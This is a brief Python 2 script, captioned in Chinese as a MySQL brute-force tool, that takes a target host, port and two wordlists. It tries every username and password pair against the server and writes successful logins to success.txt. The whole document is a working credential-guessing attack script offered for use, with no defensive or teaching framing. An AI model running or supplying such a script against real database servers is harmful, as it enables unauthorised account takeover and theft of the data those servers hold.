代码作用:
Mysql数据库爆破
注意事项:需要准备用户名和密码字典(两个txt)
# coding:utf-8
# author:situjing
import MySQLdb
import os
import sys
def write(name,pwd):
with open('success.txt', 'a+') as f:
f.writelines("user:"+name+" "+"password:"+pwd)
def README():
print ('+'+'-'*50+'+')
print ('mysql brup')
print ('author:sun')
print ('Time:2018-11-13')
print ('+'+'-'*50+'+')
if len(sys.argv)!=5:
print os.path.basename(sys.argv[0])+"127.0.0.1 3306 user.txt pass.txt"
sys.exit()
def mysql_brute(name,pwd):
db=None
try:
db=MySQLdb.connect(host=sys.argv[1],user=name,passwd=pwd,db='mysql',port=int(sys.argv[2]))
print ('Find password successelly :user:%s,password:%s')%(name,pwd)
write(name,pwd)
except:
print ('Not find password :user:%s,password:%s')%(name,pwd)
finally:
if db:
db.close()
if __name__ == '__main__':
README()
userlist=[i.rstrip() for i in open(sys.argv[3])]
passlist=[j.rstrip() for j in open(sys.argv[4])]
for name in userlist:
for pwd in passlist:
mysql_brute(name,pwd)